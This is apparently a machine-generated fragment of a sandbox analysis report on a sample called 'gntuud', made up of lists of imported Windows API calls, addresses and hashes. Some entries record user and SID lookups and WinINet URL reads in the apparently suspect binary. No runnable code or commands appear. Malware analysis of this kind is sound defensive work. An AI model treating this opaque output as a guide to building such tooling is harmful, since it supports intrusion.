                                                                0x00000000
                                                                0x00403d3f
                                                                0x00403d2f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403c23
                                                                0x00403c04
                                                                0x00403be5
                                                                0x00403bc6
                                                                0x00403ba3
                                                                0x00403b80
                                                                0x00403b5d
                                                                0x00403b3a
                                                                0x00403b17
                                                                0x00000000
                                                                0x00403af4
                                                                0x00403e23
                                                                0x00403e23
                                                                0x00000000
                                                                0x00403e23
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004039b2
                                                                0x004039a2
                                                                0x00403994
                                                                0x004038d1
                                                                0x00403897
                                                                0x00000000

                                                                APIs
                                                                • GetUserNameW.ADVAPI32 ref: 00403822
                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00403837
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040383A
                                                                • GetUserNameW.ADVAPI32 ref: 00403848
                                                                • LookupAccountNameW.ADVAPI32 ref: 0040386B
                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00403876
                                                                • HeapAlloc.KERNEL32(00000000), ref: 00403879
                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00403889
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040388C
                                                                • LookupAccountNameW.ADVAPI32 ref: 004038B6
                                                                • ConvertSidToStringSidW.ADVAPI32 ref: 004038C9
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004039C5
                                                                • HeapFree.KERNEL32(00000000), ref: 004039CE
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039D3
                                                                • HeapFree.KERNEL32(00000000), ref: 004039D6
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004039DD
                                                                • HeapFree.KERNEL32(00000000), ref: 004039E0
                                                                • LocalFree.KERNEL32(00000000), ref: 004039E5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                • String ID:
                                                                • API String ID: 3326663573-0
                                                                • Opcode ID: 763f805ec03708986885300813f112d4a2d66c911ceb533b011a2ab43863eab0
                                                                • Instruction ID: 89794ae1973fad5ea7192e5804e0dc8d95b01a905eaed68a0387455b0bbf754c
                                                                • Opcode Fuzzy Hash: 763f805ec03708986885300813f112d4a2d66c911ceb533b011a2ab43863eab0
                                                                • Instruction Fuzzy Hash: 857160B1E00209ABDB14DFA5DC85BAFBFBCEF49300F40453AE905A7281DB759905CB64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0097299C
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 00972552
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 00972564
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 00972576
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 00972588
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 0097259A
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 009725AC
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 009725BE
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 009725D0
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 009725E2
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 009725F4
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 00972606
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 00972618
                                                                  • Part of subcall function 00972535: _free.LIBCMT ref: 0097262A
                                                                • _free.LIBCMT ref: 00972991
                                                                  • Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
                                                                  • Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910
                                                                • _free.LIBCMT ref: 009729B3
                                                                • _free.LIBCMT ref: 009729C8
                                                                • _free.LIBCMT ref: 009729D3
                                                                • _free.LIBCMT ref: 009729F5
                                                                • _free.LIBCMT ref: 00972A08
                                                                • _free.LIBCMT ref: 00972A16
                                                                • _free.LIBCMT ref: 00972A21
                                                                • _free.LIBCMT ref: 00972A59
                                                                • _free.LIBCMT ref: 00972A60
                                                                • _free.LIBCMT ref: 00972A7D
                                                                • _free.LIBCMT ref: 00972A95
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
                                                                • Instruction ID: 836c9231bfd6cd889f6c513008bc6e9c29fc9ef20506ac3a9aca1505d3a0155d
                                                                • Opcode Fuzzy Hash: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
                                                                • Instruction Fuzzy Hash: 16313832610305AFEB35AB78D945B5A73ECEF80310F68842AF059D7191DB70ED80DB24
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 00422735
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004222EB
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004222FD
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042230F
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422321
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422333
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422345
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422357
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 00422369
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042237B
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042238D
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 0042239F
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004223B1
                                                                  • Part of subcall function 004222CE: _free.LIBCMT ref: 004223C3
                                                                • _free.LIBCMT ref: 0042272A
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 0042274C
                                                                • _free.LIBCMT ref: 00422761
                                                                • _free.LIBCMT ref: 0042276C
                                                                • _free.LIBCMT ref: 0042278E
                                                                • _free.LIBCMT ref: 004227A1
                                                                • _free.LIBCMT ref: 004227AF
                                                                • _free.LIBCMT ref: 004227BA
                                                                • _free.LIBCMT ref: 004227F2
                                                                • _free.LIBCMT ref: 004227F9
                                                                • _free.LIBCMT ref: 00422816
                                                                • _free.LIBCMT ref: 0042282E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
                                                                • Instruction ID: 461f1e78c3464bc4a48008cddc69d5b42509e70b2aac72d5241b0bc94f255431
                                                                • Opcode Fuzzy Hash: ebc5cb21bf1c7959a8495938e285af39c5308b391aaf683f17be292b00f8d591
                                                                • Instruction Fuzzy Hash: 0E316031B04311EFDB20AA3AE945B9773E8AF50314F91452FE845D7251DBB8EC92872C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00969F69
                                                                • type_info::operator==.LIBVCRUNTIME ref: 00969F90
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 0096A09C
                                                                • CatchIt.LIBVCRUNTIME ref: 0096A0F1
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0096A177
                                                                • _UnwindNestedFrames.LIBCMT ref: 0096A1FE
                                                                • CallUnexpected.LIBVCRUNTIME ref: 0096A219
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 4234981820-393685449
                                                                • Opcode ID: 91fe4b33738a25345e88ffee5e2d1111797d185349d5d2f341cacdd7ca2a9c0e
                                                                • Instruction ID: 4b33e437b62068abc1fcf9945158e047db20b4ebe833a27b9a4e608c555e4ff5
                                                                • Opcode Fuzzy Hash: 91fe4b33738a25345e88ffee5e2d1111797d185349d5d2f341cacdd7ca2a9c0e
                                                                • Instruction Fuzzy Hash: A8C18871800209EFCF29DFA4D881AAEBBB9FF55310F11415AE815BB212D735DA51CFA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00419D02
                                                                • type_info::operator==.LIBVCRUNTIME ref: 00419D29
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00419E35
                                                                • CatchIt.LIBVCRUNTIME ref: 00419E8A
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00419F10
                                                                • _UnwindNestedFrames.LIBCMT ref: 00419F97
                                                                • CallUnexpected.LIBVCRUNTIME ref: 00419FB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 4234981820-393685449
                                                                • Opcode ID: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
                                                                • Instruction ID: 55aba353ce1f2b03f7557c62acf52ca59a8224d4baa2e58a88d4b1d7c662f595
                                                                • Opcode Fuzzy Hash: 6a5e155c9986efd97b7d459fbe106e95df93c5a924db6e052d510ffac938e950
                                                                • Instruction Fuzzy Hash: D9C18B71900209AFCF29DFA5C8919EEBBB5BF14314F04415BE815AB242D339DD92CF9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00423398: CreateFileW.KERNEL32(00000000,00000000,?,00423788,?,?,00000000,?,00423788,00000000,0000000C), ref: 004233B5
                                                                • GetLastError.KERNEL32 ref: 004237F3
                                                                • __dosmaperr.LIBCMT ref: 004237FA
                                                                • GetFileType.KERNEL32(00000000), ref: 00423806
                                                                • GetLastError.KERNEL32 ref: 00423810
                                                                • __dosmaperr.LIBCMT ref: 00423819
                                                                • CloseHandle.KERNEL32(00000000), ref: 00423839
                                                                • CloseHandle.KERNEL32(0041E51E), ref: 00423986
                                                                • GetLastError.KERNEL32 ref: 004239B8
                                                                • __dosmaperr.LIBCMT ref: 004239BF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
                                                                • Instruction ID: b003a15c628702d40cfbcecca9f7353160345fca733c1857a0ba88a793590157
                                                                • Opcode Fuzzy Hash: 1ce13e6fd8c28752e2ddd2a23a2d287ae7b2b8bd4a2202f9c8fd90ddaa5a1295
                                                                • Instruction Fuzzy Hash: 5DA12772B001548FCF19EF68EC917AE3BB0AB46315F54016EE811AF391C73C9956CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 0041EE70
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 0041EE7C
                                                                • _free.LIBCMT ref: 0041EE87
                                                                • _free.LIBCMT ref: 0041EE92
                                                                • _free.LIBCMT ref: 0041EE9D
                                                                • _free.LIBCMT ref: 0041EEA8
                                                                • _free.LIBCMT ref: 0041EEB3
                                                                • _free.LIBCMT ref: 0041EEBE
                                                                • _free.LIBCMT ref: 0041EEC9
                                                                • _free.LIBCMT ref: 0041EED7
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
                                                                • Instruction ID: 06351b20bf99703dcd7bf9b8d39c0ae7e0177a32b915429fb414c1ff2a1cc787
                                                                • Opcode Fuzzy Hash: f30e698eb1c1ff19beb48a09c14b1ed35e428e17ffab047da0a82443fd473b72
                                                                • Instruction Fuzzy Hash: 4321EABA940208EFCF41EF96C841CDE7BB8AF18344B81416AF9159B121EB35DA95CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 0096F0D7
                                                                  • Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
                                                                  • Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910
                                                                • _free.LIBCMT ref: 0096F0E3
                                                                • _free.LIBCMT ref: 0096F0EE
                                                                • _free.LIBCMT ref: 0096F0F9
                                                                • _free.LIBCMT ref: 0096F104
                                                                • _free.LIBCMT ref: 0096F10F
                                                                • _free.LIBCMT ref: 0096F11A
                                                                • _free.LIBCMT ref: 0096F125
                                                                • _free.LIBCMT ref: 0096F130
                                                                • _free.LIBCMT ref: 0096F13E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 319d3990c105e5385206965719a395ca335ef1808df55c023be15a30ffd47ec3
                                                                • Instruction ID: e965290a3ecf00389539a7b271d3bad52058d4d2c1c2301fd0def6ab2f566ddb
                                                                • Opcode Fuzzy Hash: 319d3990c105e5385206965719a395ca335ef1808df55c023be15a30ffd47ec3
                                                                • Instruction Fuzzy Hash: 1021797A900108AFDB41EFA4C881EDE7BB9FF48340F8585A6F515AB121DB31EA54DB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042767F), ref: 00427D2C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer
                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                • API String ID: 3527080286-3064271455
                                                                • Opcode ID: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
                                                                • Instruction ID: 06daac8c886ad40bfc3f5fc7b7f7e77c663449c06db021f2b6458f19738d1afc
                                                                • Opcode Fuzzy Hash: 43d1fcc8e3c27067cf0fe46aebf70cd92f7bd8f29e8a0d1e94542de1873b69ac
                                                                • Instruction Fuzzy Hash: 12517170A0852ACBCF149F58F9481AEBFB0FF49305F924096E441A7264C77C9D5A8B6D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
                                                                • Instruction ID: 695c135c883edefd4ba4ca54e5bdfb30f2d87a08687ecf6398ebfa07137174cd
                                                                • Opcode Fuzzy Hash: 0b607198fc18c4977b59bfda8267b468835187ce52ba6938479eef1a471207c7
                                                                • Instruction Fuzzy Hash: 58C105B2E046499FDF15DF99C881BBDBBB4EF89300F048169F688A7392C7349941CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11743b40c01e3959784268cd5079b5cfeda78e420ac9c0762f079648b26ee728
                                                                • Instruction ID: c3b722db2c5acca593ef2b985c6e8c5028b49e802bec8f04f8f593b2d7ca9a6e
                                                                • Opcode Fuzzy Hash: 11743b40c01e3959784268cd5079b5cfeda78e420ac9c0762f079648b26ee728
                                                                • Instruction Fuzzy Hash: 9EC1F7B0F042559FDF11DF99E880BAE7BB0BF49304F91405BE941A7392C7789982CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$___from_strstr_to_strchr
                                                                • String ID:
                                                                • API String ID: 3409252457-0
                                                                • Opcode ID: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
                                                                • Instruction ID: 5262ae90983e57a577d1a6d47923df6c9a1a1cc28a3224689016cc5a84fe2567
                                                                • Opcode Fuzzy Hash: 03f36e046b91981e3c1c6dd44dd11d7b0534c91b7869a7ac2354f936c8b3a0a3
                                                                • Instruction Fuzzy Hash: 5F517E70F40324EFEB10AF76A88199E7BB4AF21314F94406FE91097262EE3D9941CB4D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00953AA1
                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00953AD2
                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00953AE0
                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00953AF3
                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00953B1D
                                                                • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00953B30
                                                                • LocalFree.KERNEL32(00000000), ref: 00953C4C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap$AccountLookupName$ConvertFreeLocalString
                                                                • String ID:
                                                                • API String ID: 856199767-0
                                                                • Opcode ID: e592beb6ddb58f0755ff5d118e395410ab74721bc032d0bb8e1f808109db77ce
                                                                • Instruction ID: 3e0b14f8d8819acc0aed4d999d690aec498d90aae4d8d45e972bd822ce8ccb24
                                                                • Opcode Fuzzy Hash: e592beb6ddb58f0755ff5d118e395410ab74721bc032d0bb8e1f808109db77ce
                                                                • Instruction Fuzzy Hash: D6717FB1E00209AFDB14DFA5DC85FBFBBB9EF48341F408529E905A7241DB359909CB64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • InternetOpenW.WININET(00434EFC,00000000,00000000,00000000,00000000), ref: 004042CC
                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004042DE
                                                                • InternetReadFile.WININET(00000000,2F6E538A,03E80000,03E80000), ref: 004042F1
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404302
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404305
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404313
                                                                • InternetCloseHandle.WININET(00000000), ref: 00404316
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandle$Open$FileRead
                                                                • String ID:
                                                                • API String ID: 4294395943-0
                                                                • Opcode ID: 8395a66500458d0487bad4bbdefcd728457b01d8b9aacd34fc5206d26ed1c58e
                                                                • Instruction ID: d4460e6594f183dd8fbd5c6a35e334755fb906af117da0c2693caa719dd5e9b3
                                                                • Opcode Fuzzy Hash: 8395a66500458d0487bad4bbdefcd728457b01d8b9aacd34fc5206d26ed1c58e
                                                                • Instruction Fuzzy Hash: 1D51C571F00108ABDB14DFA4CC41BEEBB75EF89300F60852EE911B7290D7399945CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 004195E7
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 004195EF
                                                                • _ValidateLocalCookies.LIBCMT ref: 00419678
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004196A3
                                                                • _ValidateLocalCookies.LIBCMT ref: 004196F8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
                                                                • Instruction ID: 5178301fb53efe35cb3bc6ec9000bbd01032083e63e087f95639f1ef71daa0d4
                                                                • Opcode Fuzzy Hash: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
                                                                • Instruction Fuzzy Hash: 8A41EA34A00218ABCF10DF69C894ADE7BB1BF45328F14816BE8145B352D739DE95CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_400000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 0-537541572
                                                                • Opcode ID: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
                                                                • Instruction ID: d7f8f66c5accd2a474fa2c9e550e026180df2d9793049625905f73b7f49e49c8
                                                                • Opcode Fuzzy Hash: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
                                                                • Instruction Fuzzy Hash: 16212E79A01210EBCB3197649C40AEB37689B05760F610273ED06E73D1D639ED4B85DC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0097269C: _free.LIBCMT ref: 009726C1
                                                                • _free.LIBCMT ref: 00972722
                                                                  • Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
                                                                  • Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910
                                                                • _free.LIBCMT ref: 0097272D
                                                                • _free.LIBCMT ref: 00972738
                                                                • _free.LIBCMT ref: 0097278C
                                                                • _free.LIBCMT ref: 00972797
                                                                • _free.LIBCMT ref: 009727A2
                                                                • _free.LIBCMT ref: 009727AD
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_950000_gntuud.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
                                                                • Instruction ID: b6145ad136abecd8e7b416efbef7e5a8e81f4cdaebf67624c131837644bd5df0
                                                                • Opcode Fuzzy Hash: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
                                                                • Instruction Fuzzy Hash: 6911F1B2554B04ABE720B7B0DD47FCB779C9F88700F84882BB2DD66152DA75B5045B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00422435: _free.LIBCMT ref: 0042245A
                                                                • _free.LIBCMT ref: 004224BB
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 004224C6
                                                                • _free.LIBCMT ref: 004224D1
                                                                • _free.LIBCMT ref: 00422525
                                                                • _free.LIBCMT ref: 00422530
                                                                • _free.LIBCMT ref: 0042253B
